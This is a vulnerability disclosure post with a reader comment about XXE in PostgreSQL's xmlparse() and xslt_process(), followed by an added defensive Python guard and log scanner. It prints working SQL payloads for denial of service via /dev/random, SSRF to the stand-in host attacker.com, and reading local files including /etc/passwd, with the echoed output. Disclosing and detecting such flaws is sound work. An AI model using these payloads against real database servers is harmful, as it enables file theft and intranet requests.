Recently we found and published at PHDays a PostgreSQL 0day error-based XXE (XML External Entity) vulnerability.
Currently it may be used by an attacker to read parts of local files and to make requests from the DB server into the intranet (SSRF - Server Side Request Forgery).
Examples:
DoS (the parser never reaches the end of the device):
select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/dev/random">]><content>&abc;</content>');
SSRF (the DB server makes the outbound request):
select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "http://attacker.com/?xxe=OK">]><content>&abc;</content>');
Error-based XXE (lines of the target file are echoed back inside the parser error):
select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;</content>');
ERROR: invalid XML document
DETAILS: /etc/network/if-up.d/mountnfs:28: parser error : StartTag: invalid element name
exec 9<&0 </etc/fstab
         ^
/etc/network/if-up.d/mountnfs:28: parser error : xmlParseEntityRef: no name
exec 9<&0 </etc/fstab
         ^
/etc/network/if-up.d/mountnfs:28: parser error : chunk is not well balanced
exec 9<&0 </etc/fstab
         ^
Entity: line 1: parser error : Failure to process entity abc
E content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;
                                                                               ^
Entity: line 1: parser error : Entity 'abc' not defined
E content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;
                                                                               ^
UPDATE! Classical XXE in the XSLT transformation (xslt_process) found.
Reading arbitrary files is also possible:
SELECT xslt_process('<!DOCTYPE employee [<!ENTITY asd SYSTEM "/etc/passwd">] ><employee><name>&asd;</name><age>30</age><pay>400</pay></employee>'::text, $$<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0"><xsl:template match="*"> <xsl:element name="samples"> <xsl:element name="sample"><xsl:value-of select="//employee/name/text()"/> </xsl:element> </xsl:element></xsl:template></xsl:stylesheet>$$::text, 'n1=v1,n2=v2,n3=v3,n4=v4,n5=v5'::text);
xslt_process
-----------------------------------------------------------------------------------------
<?xml version="1.0"?>
<samples><sample>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
nslcd:x:101:103:nslcd name service LDAP connection daemon,,,:/var/run/nslcd/:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
puppet:x:109:111:Puppet configuration management daemon,,,:/var/lib/puppet:/bin/false
Debian-exim:x:111:115::/var/spool/exim4:/bin/false
alexandro:x:1000:1000:Alexander Golovko,,,:/home/alexandro:/bin/bash
oxod:x:1001:1001:,,,:/home/oxod:/bin/bash
mysql:x:103:105:MySQL Server,,,:/var/lib/mysql:/bin/false
postgres:x:104:107:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
oracle:x:1002:1002::/u01/app/oracle:/bin/bash
</sample></samples>
(1 row)
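All three xmlparse() payloads and the xslt_process() payload above share one feature: a DOCTYPE whose internal subset declares an entity with a SYSTEM (or PUBLIC) identifier. The following Python is an added example, not code from the original post or from PostgreSQL: one small classifier used two ways, as an application-layer guard that refuses any DTD before the text is handed to the database, and as a detector over PostgreSQL statement logs. The log lines are constructed for the example (the "statement:" prefix assumes log_statement = 'all' style logging), and the impact categories (dos / ssrf / file-read) are this example's own labels, chosen to match the three cases the post demonstrates.

```python
"""Added example (not part of the original post): a defender-side check for
the XXE payload shape shown above. The same classifier serves as an
application-layer guard before xmlparse()/xslt_process() and as a detector
run over PostgreSQL statement logs. Log lines below are constructed."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    line_no: int    # 1-based index into the scanned log lines
    function: str   # xmlparse / xslt_process / unknown
    entity: str     # entity name declared in the DTD
    uri: str        # external identifier libxml2 would try to open
    category: str   # dos / ssrf / file-read / unknown


# Any DTD at all: the safe default for application input is to refuse it.
_DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# An entity declared with an external identifier (SYSTEM "uri" or PUBLIC "id" "uri"),
# the libxml2 feature every payload on this page relies on.
_ENTITY_RE = re.compile(
    r"""<!ENTITY\s+(?:%\s*)?(?P<name>[^\s>]+)\s+"""
    r"""(?:SYSTEM\s+(?P<sys>"[^"]*"|'[^']*')"""
    r"""|PUBLIC\s+(?:"[^"]*"|'[^']*')\s+(?P<pub>"[^"]*"|'[^']*'))""",
    re.IGNORECASE,
)
_FUNC_RE = re.compile(r"\b(xmlparse|xslt_process)\s*\(", re.IGNORECASE)
# Devices that never hit EOF, so the parser blocks forever (the DoS case above).
_ENDLESS_DEVICES = {"/dev/random", "/dev/urandom", "/dev/zero", "/dev/stdin"}

# Constructed log lines in the shape of PostgreSQL's stderr log with log_statement = 'all'.
SAMPLE_LOG = [
    """2013-06-01 10:15:01 UTC [4471] app@db LOG:  statement: select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/dev/random">]><content>&abc;</content>')""",
    """2013-06-01 10:15:02 UTC [4471] app@db LOG:  statement: select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "http://attacker.com/?xxe=OK">]><content>&abc;</content>')""",
    """2013-06-01 10:15:03 UTC [4471] app@db LOG:  statement: SELECT xslt_process('<!DOCTYPE employee [<!ENTITY asd SYSTEM "/etc/passwd">] ><employee><name>&asd;</name></employee>'::text, $$<xsl:stylesheet/>$$::text)""",
    """2013-06-01 10:15:04 UTC [4471] app@db LOG:  statement: select xmlparse(document '<?xml version="1.0"?><content>hello</content>')""",
    """2013-06-01 10:15:05 UTC [4471] app@db LOG:  statement: select name from employees where id = 7""",
]


def find_external_entities(xml):
    """Return (entity name, uri) for every SYSTEM/PUBLIC entity declaration."""
    found = []
    for m in _ENTITY_RE.finditer(xml):
        quoted = m.group("sys") or m.group("pub")
        found.append((m.group("name"), quoted[1:-1]))   # strip the quotes
    return found


def classify_uri(uri):
    """Map the external identifier to the impact class it would have."""
    u = uri.strip()
    scheme = re.match(r"^([a-z][a-z0-9+.-]*)://", u, re.IGNORECASE)
    if scheme:
        if scheme.group(1).lower() != "file":
            return "ssrf"        # DB server opens an outbound connection
        u = u[scheme.end():]     # file:///path -> /path
    if u in _ENDLESS_DEVICES:
        return "dos"
    if u.startswith("/"):
        return "file-read"       # content leaks via the document or the parser error
    return "unknown"


def doctype_free(xml):
    """True when the document carries no DTD at all."""
    return _DOCTYPE_RE.search(xml) is None


def guard_xml(xml):
    """Application-side gate: raise instead of passing a DTD to the database."""
    if not doctype_free(xml):
        raise ValueError("XML input carrying a DOCTYPE is not accepted")
    return xml


def scan_statement_log(lines):
    """Flag logged statements whose XML declares an external entity."""
    findings = []
    for n, line in enumerate(lines, 1):
        if "statement:" not in line:
            continue
        stmt = line.split("statement:", 1)[1]
        f = _FUNC_RE.search(stmt)
        func = f.group(1).lower() if f else "unknown"
        for name, uri in find_external_entities(stmt):
            findings.append(Finding(n, func, name, uri, classify_uri(uri)))
    return findings


if __name__ == "__main__":
    for f in scan_statement_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.function}() loads {f.uri!r} via &{f.entity}; -> {f.category}")
```

The guard is deliberately stricter than the detector: it rejects every DOCTYPE rather than only external entities, because the database-side parser is the one that decides what a DTD means and the application cannot see how it is configured. The detector is the weaker, after-the-fact control; on a server where xml2 has been removed (see the comment below) the xslt_process() pattern should simply never appear in the log.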
I'd like to note that xslt_process is from the xml2 postgres module, which is being deprecated [1]. E.g. in psql 9.1.3 it is turned off by default.
PS. That's why I wasn't able to discover this file-reading during phdays =)
[1] http://www.postgresql.org/docs/9.1/static/xml2.html